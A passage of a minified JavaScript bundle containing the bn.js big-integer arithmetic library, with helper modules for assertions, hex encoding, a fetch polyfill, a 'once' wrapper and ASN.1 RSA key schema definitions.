Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ha,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,A.length++),A};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var A,v=this.length+l.length;return A=10===this.length&&10===l.length?D(this,l,f):v<63?p(this,l,f):v<1024?function w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var A=0,v=0,P=0;P<f.length-1;P++){var G=v;v=0;for(var X=67108863&A,L=Math.min(P,l.length-1),h=Math.max(0,P-z.length+1);h<=L;h++){var ue=(0|z.words[P-h])*(0|l.words[h]),Ie=67108863&ue;X=67108863&(Ie=Ie+X|0),v+=(G=(G=G+(ue/67108864|0)|0)+(Ie>>>26)|0)>>>26,G&=67108863}f.words[P]=X,A=G,G=v}return 0!==A?f.words[P]=A:f.length--,f.strip()}(this,l,f):x(this,l,f),A},S.prototype.makeRBT=function(l){for(var f=new Array(l),A=I.prototype._countBits(l)-1,v=0;v<l;v++)f[v]=this.revBin(v,A,l);return f},S.prototype.revBin=function(l,f,A){if(0===l||l===A-1)return l;for(var v=0,P=0;P<f;P++)v|=(1&l)<<f-P-1,l>>=1;return v},S.prototype.permute=function(l,f,A,v,P,G){for(var X=0;X<G;X++)v[X]=f[l[X]],P[X]=A[l[X]]},S.prototype.transform=function(l,f,A,v,P,G){this.permute(G,l,f,A,v,P);for(var X=1;X<P;X<<=1)for(var L=X<<1,h=Math.cos(2*Math.PI/L),R=Math.sin(2*Math.PI/L),J=0;J<P;J+=L)for(var Z=h,ue=R,Ie=0;Ie<X;Ie++){var Ae=A[J+Ie],Ue=v[J+Ie],Xe=A[J+Ie+X],He=v[J+Ie+X],Be=Z*Xe-ue*He;He=Z*He+ue*Xe,A[J+Ie]=Ae+(Xe=Be),v[J+Ie]=Ue+He,A[J+Ie+X]=Ae-Xe,v[J+Ie+X]=Ue-He,Ie!==L&&(Be=h*Z-R*ue,ue=h*ue+R*Z,Z=Be)}},S.prototype.guessLen13b=function(l,f){var A=1|Math.max(f,l),v=1&A,P=0;for(A=A/2|0;A;A>>>=1)P++;return 1<<P+1+v},S.prototype.conjugate=function(l,f,A){if(!(A<=1))for(var v=0;v<A/2;v++){var P=l[v];l[v]=l[A-v-1],l[A-v-1]=P,P=f[v],f[v]=-f[A-v-1],f[A-v-1]=-P}},S.prototype.normalize13b=function(l,f){for(var A=0,v=0;v<f/2;v++){var P=8192*Math.round(l[2*v+1]/f)+Math.round(l[2*v]/f)+A;l[v]=67108863&P,A=P<67108864?0:P/67108864|0}return l},S.prototype.convert13b=function(l,f,A,v){for(var P=0,G=0;G<f;G++)A[2*G]=8191&(P+=0|l[G]),A[2*G+1]=8191&(P>>>=13),P>>>=13;for(G=2*f;G<v;++G)A[G]=0;$(0===P),$(0==(-8192&P))},S.prototype.stub=function(l){for(var f=new Array(l),A=0;A<l;A++)f[A]=0;return f},S.prototype.mulp=function(l,f,A){var v=2*this.guessLen13b(l.length,f.length),P=this.makeRBT(v),G=this.stub(v),X=new Array(v),L=new Array(v),h=new Array(v),R=new Array(v),J=new Array(v),Z=new Array(v),ue=A.words;ue.length=v,this.convert13b(l.words,l.length,X,v),this.convert13b(f.words,f.length,R,v),this.transform(X,G,L,h,v,P),this.transform(R,G,J,Z,v,P);for(var Ie=0;Ie<v;Ie++){var Ae=L[Ie]*J[Ie]-h[Ie]*Z[Ie];h[Ie]=L[Ie]*Z[Ie]+h[Ie]*J[Ie],L[Ie]=Ae}return this.conjugate(L,h,v),this.transform(L,h,ue,G,v,P),this.conjugate(ue,G,v),this.normalize13b(ue,v),A.negative=l.negative^f.negative,A.length=l.length+f.length,A.strip()},I.prototype.mul=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),this.mulTo(l,f)},I.prototype.mulf=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),x(this,l,f)},I.prototype.imul=function(l){return this.clone().mulTo(l,this)},I.prototype.imuln=function(l){$("number"==typeof l),$(l<67108864);for(var f=0,A=0;A<this.length;A++){var v=(0|this.words[A])*l,P=(67108863&v)+(67108863&f);f>>=26,f+=v/67108864|0,f+=P>>>26,this.words[A]=67108863&P}return 0!==f&&(this.words[A]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function M(z){for(var l=new Array(z.bitLength()),f=0;f<l.length;f++){var v=f%26;l[f]=(z.words[f/26|0]&1<<v)>>>v}return l}(l);if(0===f.length)return new I(1);for(var A=this,v=0;v<f.length&&0===f[v];v++,A=A.sqr());if(++v<f.length)for(var P=A.sqr();v<f.length;v++,P=P.sqr())0!==f[v]&&(A=A.mul(P));return A},I.prototype.iushln=function(l){$("number"==typeof l&&l>=0);var P,f=l%26,A=(l-f)/26,v=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P<this.length;P++){var X=this.words[P]&v;this.words[P]=(0|this.words[P])-X<<f|G,G=X>>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==A){for(P=this.length-1;P>=0;P--)this.words[P+A]=this.words[P];for(P=0;P<A;P++)this.words[P]=0;this.length+=A}return this.strip()},I.prototype.ishln=function(l){return $(0===this.negative),this.iushln(l)},I.prototype.iushrn=function(l,f,A){var v;$("number"==typeof l&&l>=0),v=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<<P,L=A;if(v-=G,v=Math.max(0,v),L){for(var h=0;h<G;h++)L.words[h]=this.words[h];L.length=G}if(0!==G)if(this.length>G)for(this.length-=G,h=0;h<this.length;h++)this.words[h]=this.words[h+G];else this.words[0]=0,this.length=1;var R=0;for(h=this.length-1;h>=0&&(0!==R||h>=v);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,A){return $(0===this.negative),this.iushrn(l,f,A)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return!(this.length<=A||!(this.words[A]&1<<f))},I.prototype.imaskn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return $(0===this.negative,"imaskn works only with positive numbers"),this.length<=A?this:(0!==f&&A++,this.length=Math.min(A,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<<f),this.strip())},I.prototype.maskn=function(l){return this.clone().imaskn(l)},I.prototype.iaddn=function(l){return $("number"==typeof l),$(l<67108864),l<0?this.isubn(-l):0!==this.negative?1===this.length&&(0|this.words[0])<l?(this.words[0]=l-(0|this.words[0]),this.negative=0,this):(this.negative=0,this.isubn(l),this.negative=1,this):this._iaddn(l)},I.prototype._iaddn=function(l){this.words[0]+=l;for(var f=0;f<this.length&&this.words[f]>=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if($("number"==typeof l),$(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f<this.length&&this.words[f]<0;f++)this.words[f]+=67108864,this.words[f+1]-=1;return this.strip()},I.prototype.addn=function(l){return this.clone().iaddn(l)},I.prototype.subn=function(l){return this.clone().isubn(l)},I.prototype.iabs=function(){return this.negative=0,this},I.prototype.abs=function(){return this.clone().iabs()},I.prototype._ishlnsubmul=function(l,f,A){var P;this._expand(l.length+A);var G,X=0;for(P=0;P<l.length;P++){G=(0|this.words[P+A])+X;var L=(0|l.words[P])*f;X=((G-=67108863&L)>>26)-(L/67108864|0),this.words[P+A]=67108863&G}for(;P<this.length-A;P++)X=(G=(0|this.words[P+A])+X)>>26,this.words[P+A]=67108863&G;if(0===X)return this.strip();for($(-1===X),X=0,P=0;P<this.length;P++)X=(G=-(0|this.words[P])+X)>>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var A,v=this.clone(),P=l,G=0|P.words[P.length-1];0!=(A=26-this._countBits(G))&&(P=P.ushln(A),v.iushln(A),G=0|P.words[P.length-1]);var h,L=v.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R<h.length;R++)h.words[R]=0}var J=v.clone()._ishlnsubmul(P,1,L);0===J.negative&&(v=J,h&&(h.words[L]=1));for(var Z=L-1;Z>=0;Z--){var ue=67108864*(0|v.words[P.length+Z])+(0|v.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),v._ishlnsubmul(P,ue,Z);0!==v.negative;)ue--,v.negative=0,v._ishlnsubmul(P,1,Z),v.isZero()||(v.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),v.strip(),"div"!==f&&0!==A&&v.iushrn(A),{div:h||null,mod:v}},I.prototype.divmod=function(l,f,A){return $(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(v=G.div.neg()),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.iadd(l)),{div:v,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(v=G.div.neg()),{div:v,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var v,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var A=0!==f.div.negative?f.mod.isub(l):f.mod,v=l.ushrn(1),P=l.andln(1),G=A.cmp(v);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){$(l<=67108863);for(var f=(1<<26)%l,A=0,v=this.length-1;v>=0;v--)A=(f*A+(0|this.words[v]))%l;return A},I.prototype.idivn=function(l){$(l<=67108863);for(var f=0,A=this.length-1;A>=0;A--){var v=(0|this.words[A])+67108864*f;this.words[A]=v/l|0,f=v%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){$(0===l.negative),$(!l.isZero());var f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&A.isEven();)f.iushrn(1),A.iushrn(1),++L;for(var h=A.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(v.isOdd()||P.isOdd())&&(v.iadd(h),P.isub(R)),v.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(A.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(A.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(G),P.isub(X)):(A.isub(f),G.isub(v),X.isub(P))}return{a:G,b:X,gcd:A.iushln(L)}},I.prototype._invmp=function(l){$(0===l.negative),$(!l.isZero());var J,f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=A.clone();f.cmpn(1)>0&&A.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)v.isOdd()&&v.iadd(G),v.iushrn(1);for(var h=0,R=1;0==(A.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(A.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(P)):(A.isub(f),P.isub(v))}return(J=0===f.cmpn(1)?v:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),A=l.clone();f.negative=0,A.negative=0;for(var v=0;f.isEven()&&A.isEven();v++)f.iushrn(1),A.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;A.isEven();)A.iushrn(1);var P=f.cmp(A);if(P<0){var G=f;f=A,A=G}else if(0===P||0===A.cmpn(1))break;f.isub(A)}return A.iushln(v)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){$("number"==typeof l);var f=l%26,A=(l-f)/26,v=1<<f;if(this.length<=A)return this._expand(A+1),this.words[A]|=v,this;for(var P=v,G=A;0!==P&&G<this.length;G++){var X=0|this.words[G];P=(X+=P)>>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var A,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)A=1;else{f&&(l=-l),$(l<=67108863,"Number is too big");var v=0|this.words[0];A=v===l?0:v<l?-1:1}return 0!==this.negative?0|-A:A},I.prototype.cmp=function(l){if(0!==this.negative&&0===l.negative)return-1;if(0===this.negative&&0!==l.negative)return 1;var f=this.ucmp(l);return 0!==this.negative?0|-f:f},I.prototype.ucmp=function(l){if(this.length>l.length)return 1;if(this.length<l.length)return-1;for(var f=0,A=this.length-1;A>=0;A--){var v=0|this.words[A],P=0|l.words[A];if(v!==P){v<P?f=-1:v>P&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return $(!this.red,"Already a number in reduction context"),$(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return $(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return $(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return $(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return $(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return $(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return $(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return $(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return $(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return $(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return $(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return $(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return $(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return $(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function U(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){U.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){U.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){U.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){U.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else $(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}U.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},U.prototype.ireduce=function(l){var A,f=l;do{this.split(f,this.tmp),A=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(A>this.n);var v=A<this.n?-1:f.ucmp(this.p);return 0===v?(f.words[0]=0,f.length=1):v>0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},U.prototype.split=function(l,f){l.iushrn(this.n,0,f)},U.prototype.imulK=function(l){return l.imul(this.k)},ae(K,U),K.prototype.split=function(l,f){for(var A=4194303,v=Math.min(l.length,9),P=0;P<v;P++)f.words[P]=l.words[P];if(f.length=v,l.length<=9)return l.words[0]=0,void(l.length=1);var G=l.words[9];for(f.words[f.length++]=G&A,P=10;P<l.length;P++){var X=0|l.words[P];l.words[P-10]=(X&A)<<4|G>>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,A=0;A<l.length;A++){var v=0|l.words[A];l.words[A]=67108863&(f+=977*v),f=64*v+(f/67108864|0)}return 0===l.words[l.length-1]&&(l.length--,0===l.words[l.length-1]&&l.length--),l},ae(ee,U),ae(se,U),ae(ve,U),ve.prototype.imulK=function(l){for(var f=0,A=0;A<l.length;A++){var v=19*(0|l.words[A])+f,P=67108863&v;v>>>=26,l.words[A]=P,f=v}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){$(0===l.negative,"red works only with positives"),$(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){$(0==(l.negative|f.negative),"red works only with positives"),$(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var A=l.add(f);return A.cmp(this.m)>=0&&A.isub(this.m),A._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var A=l.iadd(f);return A.cmp(this.m)>=0&&A.isub(this.m),A},le.prototype.sub=function(l,f){this._verify2(l,f);var A=l.sub(f);return A.cmpn(0)<0&&A.iadd(this.m),A._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var A=l.isub(f);return A.cmpn(0)<0&&A.iadd(this.m),A},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if($(f%2==1),3===f){var A=this.m.add(new I(1)).iushrn(2);return this.pow(l,A)}for(var v=this.m.subn(1),P=0;!v.isZero()&&0===v.andln(1);)P++,v.iushrn(1);$(!v.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,v),J=this.pow(l,v.addn(1).iushrn(1)),Z=this.pow(l,v),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();$(Ae<ue);var Ue=this.pow(R,new I(1).iushln(ue-Ae-1));J=J.redMul(Ue),R=Ue.redSqr(),Z=Z.redMul(R),ue=Ae}return J},le.prototype.invm=function(l){var f=l._invmp(this.m);return 0!==f.negative?(f.negative=0,this.imod(f).redNeg()):this.imod(f)},le.prototype.pow=function(l,f){if(f.isZero())return new I(1).toRed(this);if(0===f.cmpn(1))return l.clone();var v=new Array(16);v[0]=new I(1).toRed(this),v[1]=l;for(var P=2;P<v.length;P++)v[P]=this.mul(v[P-1],l);var G=v[0],X=0,L=0,h=f.bitLength()%26;for(0===h&&(h=26),P=f.length-1;P>=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==v[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,v[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var A=l.imul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var A=l.mul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},490:Pe=>{function we(de,ie){if(!de)throw new Error(ie||"Assertion failed")}Pe.exports=we,we.equal=function(ie,j,$){if(ie!=j)throw new Error($||"Assertion failed: "+ie+" != "+j)}},4108:(Pe,we)=>{"use strict";var de=we;function j(ae){return 1===ae.length?"0"+ae:ae}function $(ae){for(var I="",Q=0;Q<ae.length;Q++)I+=j(ae[Q].toString(16));return I}de.toArray=function ie(ae,I){if(Array.isArray(ae))return ae.slice();if(!ae)return[];var Q=[];if("string"!=typeof ae){for(var F=0;F<ae.length;F++)Q[F]=0|ae[F];return Q}if("hex"===I)for((ae=ae.replace(/[^a-z0-9]+/gi,"")).length%2!=0&&(ae="0"+ae),F=0;F<ae.length;F+=2)Q.push(parseInt(ae[F]+ae[F+1],16));else for(F=0;F<ae.length;F++){var E=ae.charCodeAt(F),g=E>>8,b=255&E;g?Q.push(g,b):Q.push(b)}return Q},de.zero2=j,de.toHex=$,de.encode=function(I,Q){return"hex"===Q?$(I):I}},8225:(Pe,we)=>{"use strict";var ie=function(){if("undefined"!=typeof self)return self;if("undefined"!=typeof window)return window;if("undefined"!=typeof global)return global;throw new Error("unable to locate global object")}();Pe.exports=we=ie.fetch,ie.fetch&&(we.default=ie.fetch.bind(ie)),we.Headers=ie.Headers,we.Request=ie.Request,we.Response=ie.Response},9885:(Pe,we,de)=>{var ie=de(6854);function j(ae){var I=function(){return I.called?I.value:(I.called=!0,I.value=ae.apply(this,arguments))};return I.called=!1,I}function $(ae){var I=function(){if(I.called)throw new Error(I.onceError);return I.called=!0,I.value=ae.apply(this,arguments)};return I.onceError=(ae.name||"Function wrapped with `once`")+" shouldn't be called more than once",I.called=!1,I}Pe.exports=ie(j),Pe.exports.strict=ie($),j.proto=j(function(){Object.defineProperty(Function.prototype,"once",{value:function(){return j(this)},configurable:!0}),Object.defineProperty(Function.prototype,"onceStrict",{value:function(){return $(this)},configurable:!0})})},7934:(Pe,we,de)=>{"use strict";var ie=de(7758);we.certificate=de(3223);var j=ie.define("RSAPrivateKey",function(){this.seq().obj(this.key("version").int(),this.key("modulus").int(),this.key("publicExponent").int(),this.key("privateExponent").int(),this.key("prime1").int(),this.key("prime2").int(),this.key("exponent1").int(),this.key("exponent2").int(),this.key("coefficient").int())});we.RSAPrivateKey=j;var $=ie.define("RSAPublicKey",function(){this.seq().obj(this.key("modulus").int(),this.key("publicExponent").int())});we.RSAPublicKey=$;var ae=ie.define("SubjectPublicKeyInfo",function(){this.seq().obj(this.key("algorithm").use(I),this.key("subjectPublicKey").bitstr())});we.PublicKey=ae;var 